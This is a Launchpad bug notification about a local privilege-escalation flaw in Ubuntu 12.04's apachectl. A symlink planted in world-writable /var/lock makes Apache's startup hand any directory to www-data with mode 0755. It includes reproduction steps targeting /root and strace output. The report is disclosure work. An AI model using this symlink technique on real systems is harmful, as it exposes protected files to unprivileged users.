*** This bug is a security vulnerability ***
You have been subscribed to a public security bug by Seth Arnold (seth-arnold):
Dear all,
The /usr/sbin/apachectl script allows unprivileged local users to change
the permissions of any directory to 0755 and in addition make the user
www-data its owner.
The script has a line:
start)
...
install -d -o ${APACHE_RUN_USER:-www-data}
${APACHE_LOCK_DIR:-/var/lock/apache2}
Since in Ubuntu the /var/lock directory has world-writable permissions, a user
can create a symbolic link to any directory. An administrator then starts
Apache through /etc/init.d/apache2, which in turn calls the script
/usr/sbin/apachectl which will change the permissions of the directory pointed
to by the symbolic link to 0755 and in addition, make the user www-data its
owner.
Details:
=====
root@u32d:~# apt-cache policy apache2.2-common
apache2.2-common:
Installed: 2.2.22-1ubuntu1
Candidate: 2.2.22-1ubuntu1.2
Version table:
2.2.22-1ubuntu1.2 0
500 http://us.archive.ubuntu.com/ubuntu/ precise-updates/main i386
Packages
500 http://security.ubuntu.com/ubuntu/ precise-security/main i386
Packages
*** 2.2.22-1ubuntu1 0
500 http://us.archive.ubuntu.com/ubuntu/ precise/main i386 Packages
100 /var/lib/dpkg/status
root@u32d:~# lsb_release -rd
Description: Ubuntu 12.04 LTS
Release: 12.04
Steps to reproduce vulnerability on Ubuntu 12.04 LTS (also applicable to
Quantal 12.10):
As an untrusted user, create a symbolic link in /var/lock to a directory
the user does not have read/search permission (e.g., /root):
hayawardh@u32d:~$ ls -ld /root
drwx------. 14 root root 4096 Jan 24 08:23 /root
hayawardh@u32d:~$ cd /var/lock
hayawardh@u32d:/var/lock$ ln -s /root apache2
Wait for the administrator to start Apache
root@u32d:~# /etc/init.d/apache2 start
* Starting web server apache2
apache2: Could not reliably determine the server's fully qualified domain name,
using 127.0.1.1 for ServerName
...done.
Now check permissions of /root:
root@u32d:~# ls -ld /root
drwxr-xr-x. 14 www-data root 4096 Jan 24 08:23 /root
Fixing this does not seem straightforward because install opens the file
to change permissions (in this case, /var/lock/apache2) without
O_NOFOLLOW, and there does not seem to be a command line switch for the
same.
Portion of strace output for install -d -o ${APACHE_RUN_USER:-www-data}
${APACHE_LOCK_DIR:-/var/lock/apache2}
mkdir("/var", 0755) = -1 EEXIST (File exists)
chdir("/var") = 0
mkdir("lock", 0755) = -1 EEXIST (File exists)
chdir("lock") = 0
mkdir("apache2", 0700) = -1 EEXIST (File exists)
open("apache2", O_RDONLY|O_NOCTTY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 3
fstat64(3, {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
fchown32(3, 33, -1) = 0
fchmod(3, 0755) = 0
close(3) = 0
Thanks,
Hayawardh
** Affects: apache2 (Ubuntu)
Importance: Undecided
Status: Confirmed
--
/usr/sbin/apachectl privilege escalation
https://bugs.launchpad.net/bugs/1104049
You received this bug notification because you are a member of Ubuntu Bugs,
which is subscribed to the bug report.
--
ubuntu-bugs mailing list
[email protected]
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
